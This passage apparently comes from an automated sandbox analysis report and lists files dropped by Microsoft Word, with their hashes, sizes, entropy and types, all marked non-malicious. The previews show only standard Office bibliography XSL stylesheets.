                                        SHA1:02FA15FDAF0D7E2F5D44CAE5FFAE49E8F91328DF
                                        SHA-256:DB2E99B969546E431548EBD58707FC001BBD1A4BDECAD387D194CC9C6D15AC89
                                        SHA-512:CC97F9B2C83FF7CAC32AB9A9D46E0ACDE13EECABECD653C88F74E4FC19806BB9498D2F49C4B5581E58E7B0CB95584787EA455E69D99899381B592BEA177D4D4B
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):5783
                                        Entropy (8bit):7.88616857639663
                                        Encrypted:false
                                        SSDEEP:96:CDG4D+8VsXzXc2zLXTJ2XFY47pk2G7HVlwFzTXNbMfmn2ivLZcreFWw5fc9ADdZm:CDG4DRGY23l2Xu47GL7YtT9V29yWvWdk
                                        MD5:8109B3C170E6C2C114164B8947F88AA1
                                        SHA1:FC63956575842219443F4B4C07A8127FBD804C84
                                        SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
                                        SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):4026
                                        Entropy (8bit):7.809492693601857
                                        Encrypted:false
                                        SSDEEP:96:VpDCBFLhxaUGm5EWA07yNdKH1FQpy8tnX8Iz3b7TrT502+fPD:VpDYFFRMNU+RtXzLf35t+3D
                                        MD5:5D9BAD7ADB88CEE98C5203883261ACA1
                                        SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
                                        SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
                                        SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):4243
                                        Entropy (8bit):7.824383764848892
                                        Encrypted:false
                                        SSDEEP:96:22MQe4zHye8/djzF+JjvtmMkkBpF7e0LTkaf:22De4zHHCvF+nRBDXoaf
                                        MD5:7BC0A35807CD69C37A949BBD51880FF5
                                        SHA1:B5870846F44CAD890C6EFF2F272A037DA016F0D8
                                        SHA-256:BD3A013F50EBF162AAC4CED11928101554C511BD40C2488CF9F5842A375B50CA
                                        SHA-512:B5B785D693216E38B5AB3F401F414CADACCDCB0DCA4318D88FE1763CD3BAB8B7670F010765296613E8D3363E47092B89357B4F1E3242F156750BE86F5F7E9B8D
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):16806
                                        Entropy (8bit):7.9519793977093505
                                        Encrypted:false
                                        SSDEEP:384:eSMjhqgJDGwOzHR3iCpK+QdLdfufFJ9aDn9LjDMVAwHknbz7OW:eSkhqglGwERSAHQdLhDn9AKokv7H
                                        MD5:950F3AB11CB67CC651082FEBE523AF63
                                        SHA1:418DE03AD2EF93D0BD29C3D7045E94D3771DACB4
                                        SHA-256:9C5E4D8966A0B30A22D92DB1DA2F0DBF06AC2EA75E7BB8501777095EA0196974
                                        SHA-512:D74BF52A58B0C0327DB9DDCAD739794020F00B3FA2DE2B44DAAEC9C1459ECAF3639A5D761BBBC6BDF735848C4FD7E124D13B23964B0055BB5AA4F6AFE76DFE00
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):11380
                                        Entropy (8bit):7.891971054886943
                                        Encrypted:false
                                        SSDEEP:192:VJcnLYnAVbOFLaCPLrGGbhaWEu6d3RmryqLkeAShObPb1AYcRMMXjkfa0nYBwggD:VcMC8lLrRbhy1ZqLyShYb1FHQ4C0nYQJ
                                        MD5:C9F9364C659E2F0C626AC0D0BB519062
                                        SHA1:C4036C576074819309D03BB74C188BF902D1AE00
                                        SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
                                        SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):6024
                                        Entropy (8bit):7.886254023824049
                                        Encrypted:false
                                        SSDEEP:96:bGa2onnLYHTSSxpHVTSH1bywZKmpRqiUtFvS9xrPooBpni6eDa16MUELHsrKjRBA:SJonLYzSSr1TuZNwtFZKpiiyrKXuCUd
                                        MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
                                        SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
                                        SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
                                        SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):9191
                                        Entropy (8bit):7.93263830735235
                                        Encrypted:false
                                        SSDEEP:192:oeAMExvPJMg+yE+AfJLi3+Xoj7F3sPgMG61J88eDhFWT7hFNsdJtnLYJ7tSh:v2d+hnfJLi3+4ja4WqhFWT7FsdHMA
                                        MD5:08D3A25DD65E5E0D36ADC602AE68C77D
                                        SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
                                        SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
                                        SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):4326
                                        Entropy (8bit):7.821066198539098
                                        Encrypted:false
                                        SSDEEP:96:+fF+Jrp7Yo5hnJiGa24TxEcpUeONo1w2NFocy2LQi33Z:2+f7YuhJdJ4TxEcmKwGkk3Z
                                        MD5:D32E93F7782B21785424AE2BEA62B387
                                        SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
                                        SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
                                        SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):7370
                                        Entropy (8bit):7.9204386289679745
                                        Encrypted:false
                                        SSDEEP:192:fYa+ngK2xG6HvLvoUnXxO+blKO1lt2Zg0AV:fYVn8Y6Hv3XxO+8uQZCV
                                        MD5:586CEBC1FAC6962F9E36388E5549FFE9
                                        SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
                                        SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
                                        SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):5596
                                        Entropy (8bit):7.875182123405584
                                        Encrypted:false
                                        SSDEEP:96:dGa2unnLYEB2EUAPOak380NQjqbHaPKJebgrEVws8Vw+BMa0EbdLVQaZJgDZh0pJ:UJunLYEB2EUAxk3pIYaScgYwsV4bdS0X
                                        MD5:CDC1493350011DB9892100E94D5592FE
                                        SHA1:684B444ADE2A8DBE760B54C08F2D28F2D71AD0FA
                                        SHA-256:F637A67799B492FEFFB65632FED7815226396B4102A7ED790E0D9BB4936E1548
                                        SHA-512:3699066A4E8A041079F12E88AB2E7F485E968619CB79175267842846A3AD64AA8E7778CBACDF1117854A7FDCFB46C8025A62F147C81074823778C6B4DC930F12
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):3683
                                        Entropy (8bit):7.772039166640107
                                        Encrypted:false
                                        SSDEEP:96:GyfQZd6ZHNCWl9aXFkZwIq/QDsRYPf8P9QtDIs5r:G6wYtNZS1k99AmPfSOtD5r
                                        MD5:E8308DA3D46D0BC30857243E1B7D330D
                                        SHA1:C7F8E54A63EB254C194A23137F269185E07F9D10
                                        SHA-256:6534D4D7EF31B967DD0A20AFFF092F8B93D3C0EFCBF19D06833F223A65C6E7C4
                                        SHA-512:88AB7263B7A8D7DDE1225AE588842E07DF3CE7A07CBD937B7E26DA7DA7CFED23F9C12730D9EF4BC1ACF26506A2A96E07875A1A40C2AD55AD1791371EE674A09B
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):4888
                                        Entropy (8bit):7.8636569313247335
                                        Encrypted:false
                                        SSDEEP:96:StrFZ23/juILHPzms5UTuK9CuZGEoEuZ28H1HiGa2RnnLY+tUb:SPZQ7uCHPzms5UTlqauZVHdJRnLY+tUb
                                        MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
                                        SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
                                        SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
                                        SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):6448
                                        Entropy (8bit):7.897260397307811
                                        Encrypted:false
                                        SSDEEP:192:tgaoRbo1sMjb0NiJ85oPtqcS+yaXWoa8XBzdJYnLYFtWT7:LR1sk+i4o1qc1yaukzd8MK
                                        MD5:42A840DC06727E42D42C352703EC72AA
                                        SHA1:21AAAF517AFB76BF1AF4E06134786B1716241D29
                                        SHA-256:02CCE7D526F844F70093AC41731D1A1E9B040905DCBA63BA8BFFC0DBD4D3A7A7
                                        SHA-512:8886BFD240D070237317352DEB3D46C6B07E392EBD57730B1DED016BD8740E75B9965F7A3FCD43796864F32AAE0BE911AB1A670E9CCC70E0774F64B1BDA93488
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):5630
                                        Entropy (8bit):7.87271654296772
                                        Encrypted:false
                                        SSDEEP:96:n5ni6jKZWsD+QJaUQ7R6qYFF5QS+BEgeJam6S7ZCHuKViGa2CnnLYLt/ht:nccqxIBdQ1QS+uDJanS7ZCHHVdJCnLY5
                                        MD5:2F8998AA9CF348F1D6DE16EAB2D92070
                                        SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
                                        SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
                                        SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):6193
                                        Entropy (8bit):7.855499268199703
                                        Encrypted:false
                                        SSDEEP:192:WavHMKgnU2HUGFhUnkbOKoztj1QfcnLYut3d8:YKeUlGXUnC+HQSMp
                                        MD5:031C246FFE0E2B623BBBD231E414E0D2
                                        SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
                                        SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
                                        SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):3075
                                        Entropy (8bit):7.716021191059687
                                        Encrypted:false
                                        SSDEEP:48:96yn4sOBoygpySCCxwKsZCB2oLEIK+aQpUNLRQWtmMamIZxAwCC2QnyODhVOzP4:l0vCxJsZQ2ofpKvtmMdIZxAwJyODhVOE
                                        MD5:67766FF48AF205B771B53AA2FA82B4F4
                                        SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
                                        SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
                                        SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):5151
                                        Entropy (8bit):7.859615916913808
                                        Encrypted:false
                                        SSDEEP:96:WkV3UHhcZDEteEJqeSGzpG43GUR8m8b6dDLiCTfjKPnD6H5RhfuDKNtxx3+7tDLp:Wq3UBc9EJqIpGgD5dDL1DjKvDKhfnNti
                                        MD5:6C24ED9C7C868DB0D55492BB126EAFF8
                                        SHA1:C6D96D4D298573B70CF5C714151CF87532535888
                                        SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
                                        SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):333258
                                        Entropy (8bit):4.654450340871081
                                        Encrypted:false
                                        SSDEEP:6144:ybW83Zb181+MKHZR5D7H3hgtfL/8mIDbEhPv9FHSVsioWUyGYmwxAw+GIfnUNv5J:i
                                        MD5:5632C4A81D2193986ACD29EADF1A2177
                                        SHA1:E8FF4FDFEB0002786FCE1CF8F3D25F8E9631E346
                                        SHA-256:06DE709513D7976690B3DD8F5FDF1E59CF456A2DFBA952B97EACC72FE47B238B
                                        SHA-512:676CE1957A374E0F36634AA9CFFBCFB1E1BEFE1B31EE876483B10763EA9B2D703F2F3782B642A5D7D0945C5149B572751EBD9ABB47982864834EF61E3427C796
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):296658
                                        Entropy (8bit):5.000002997029767
                                        Encrypted:false
                                        SSDEEP:6144:RwprAMk0qvtfL/vF/bkWPz9yv7EOMBPitjASjTQQr7IwR0TnyDkJb78plJwf33iV:M
                                        MD5:9AC6DE7B629A4A802A41F93DB2C49747
                                        SHA1:3D6E929AA1330C869D83F2BF8EBEBACD197FB367
                                        SHA-256:52984BC716569120D57C8E6A360376E9934F00CF31447F5892514DDCCF546293
                                        SHA-512:5736F14569E0341AFB5576C94B0A7F87E42499CEC5927AAC83BB5A1F77B279C00AEA86B5F341E4215076D800F085D831F34E4425AD9CFD52C7AE4282864B1E73
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):268317
                                        Entropy (8bit):5.05419861997223
                                        Encrypted:false
                                        SSDEEP:6144:JwprAJLR95vtfb8p4bgWPzDCvCmvQursq7vImej/yQzSS1apSiQhHDOruvoVeMUh:N9
                                        MD5:51D32EE5BC7AB811041F799652D26E04
                                        SHA1:412193006AA3EF19E0A57E16ACF86B830993024A
                                        SHA-256:6230814BF5B2D554397580613E20681752240AB87FD354ECECF188C1EABE0E97
                                        SHA-512:5FC5D889B0C8E5EF464B76F0C4C9E61BDA59B2D1205AC9417CC74D6E9F989FB73D78B4EB3044A1A1E1F2C00CE1CA1BD6D4D07EEADC4108C7B124867711C31810
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):255948
                                        Entropy (8bit):5.103631650117028
                                        Encrypted:false
                                        SSDEEP:6144:gwprAm795vtfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkAgRMBHcTCwsHe5a:kW
                                        MD5:9888A214D362470A6189DEFF775BE139
                                        SHA1:32B552EB3C73CD7D0D9D924C96B27A86753E0F97
                                        SHA-256:C64ED5C2A323C00E84272AD3A701CAEBE1DCCEB67231978DE978042F09635FA7
                                        SHA-512:8A75FC2713003FA40B9730D29C786C76A796F30E6ACE12064468DD2BB4BF97EF26AC43FFE1158AB1DB06FF715D2E6CDE8EF3E8B7C49AA1341603CE122F311073
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):251032
                                        Entropy (8bit):5.102652100491927
                                        Encrypted:false
                                        SSDEEP:6144:hwprA5R95vtfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1XkaNPQTlvB2zr:JA
                                        MD5:F425D8C274A8571B625EE66A8CE60287
                                        SHA1:29899E309C56F2517C7D9385ECDBB719B9E2A12B
                                        SHA-256:DD7B7878427276AF5DBF8355ECE0D1FE5D693DF55AF3F79347F9D20AE50DB938
                                        SHA-512:E567F283D903FA533977B30FD753AA1043B9DDE48A251A9AC6777A3B67667443FEAD0003765A630D0F840B6C275818D2F903B6CB56136BEDCC6D9BDD20776564
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):284415
                                        Entropy (8bit):5.00549404077789
                                        Encrypted:false
                                        SSDEEP:6144:N9G5o7Fv0ZcxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27hlwNR57johqBXlwNR2b:y
                                        MD5:33A829B4893044E1851725F4DAF20271
                                        SHA1:DAC368749004C255FB0777E79F6E4426E12E5EC8
                                        SHA-256:C40451CADF8944A9625DD690624EA1BA19CECB825A67081E8144AD5526116924
                                        SHA-512:41C1F65E818C2757E1A37F5255E98F6EDEAC4214F9D189AD09C6F7A51F036768C1A03D6CFD5845A42C455EE189D13BB795673ACE3B50F3E1D77DAFF400F4D708
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):294178
                                        Entropy (8bit):4.977758311135714
                                        Encrypted:false
                                        SSDEEP:6144:ydkJ3yU0orh0SCLVXyMFsoiOjWIm4vW2uo4hfhf7v3uH4NYYP4BpBaZTTSSamEUD:b
                                        MD5:0C9731C90DD24ED5CA6AE283741078D0
                                        SHA1:BDD3D7E5B0DE9240805EA53EF2EB784A4A121064
                                        SHA-256:ABCE25D1EB3E70742EC278F35E4157EDB1D457A7F9D002AC658AAA6EA4E4DCDF
                                        SHA-512:A39E6201D6B34F37C686D9BD144DDD38AE212EDA26E3B81B06F1776891A90D84B65F2ABC5B8F546A7EFF3A62D35E432AF0254E2F5BFE4AA3E0CF9530D25949C0
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):270198
                                        Entropy (8bit):5.073814698282113
                                        Encrypted:false
                                        SSDEEP:6144:JwprAiaR95vtfb8pDbgWPzDCvCmvQursq7vImej/yQ4SS1apSiQhHDOruvoVeMUX:We
                                        MD5:FF0E07EFF1333CDF9FC2523D323DD654
                                        SHA1:77A1AE0DD8DBC3FEE65DD6266F31E2A564D088A4
                                        SHA-256:3F925E0CC1542F09DE1F99060899EAFB0042BB9682507C907173C392115A44B5
                                        SHA-512:B4615F995FAB87661C2DBE46625AA982215D7BDE27CAFAE221DCA76087FE76DA4B4A381943436FCAC1577CB3D260D0050B32B7B93E3EB07912494429F126BB3D
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
